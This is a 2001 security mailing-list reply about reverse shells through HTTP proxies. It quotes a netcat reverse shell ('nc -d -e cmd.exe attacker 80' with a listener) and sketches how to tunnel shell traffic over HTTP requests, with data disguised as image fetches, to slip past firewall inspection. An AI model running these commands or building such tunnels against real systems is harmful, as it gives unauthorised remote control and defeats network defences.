RE: Reverse Http Shell Solution

[Frank Knobbe <FKnobbe () KnobbeITS com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> -----Original Message-----
> From: GrandmastrPlague () aol com [mailto:GrandmastrPlague () aol com]
> Sent: Thursday, October 18, 2001 2:02 PM
>
> It seems like this question has been asked a million times 
> before, but here goes the same old answer again... use netcat 
> On attacker machine: 
> nc -l -p 80 
> On victim machine: 
> nc -d -e cmd.exe attacker 80 
>
> Make sure you set up the listening machine first. 


I believe Vinícius meant that there is no way for a straight through
connection as netcat would establish, but instead the requirement to
send GET requests to the proxy which will fetch a page for you.
Netcat won't do that. You would have to have a reverse shell that
operates on a HTTP GET and PUT basis. 

You could modify netcat to do that. Instead of using TCP/UDP
connections, you can replace that mechanism with HTTP GET and PUT
ways of shuffling data, pumping that back to stdin/stdout. The only
catch is to fetch the data correctly as some firewalls will do
content inspection. One way to get around that is to pump data with
POSTs to a form as normal, but receive data via GET's from images in
the web page, or just request for images a'la http://h4x0r/data.gif.

Regards,
Frank

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.8
Comment: PGP or S/MIME (X.509) encrypted email preferred.

iQA/AwUBO8+ILpytSsEygtEFEQIpdACfcW0ho5zq0dzoNYY0dWkId3qhhosAnjOo
7M3sMCeCgjkYKDpMousASMQa
=MS16
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/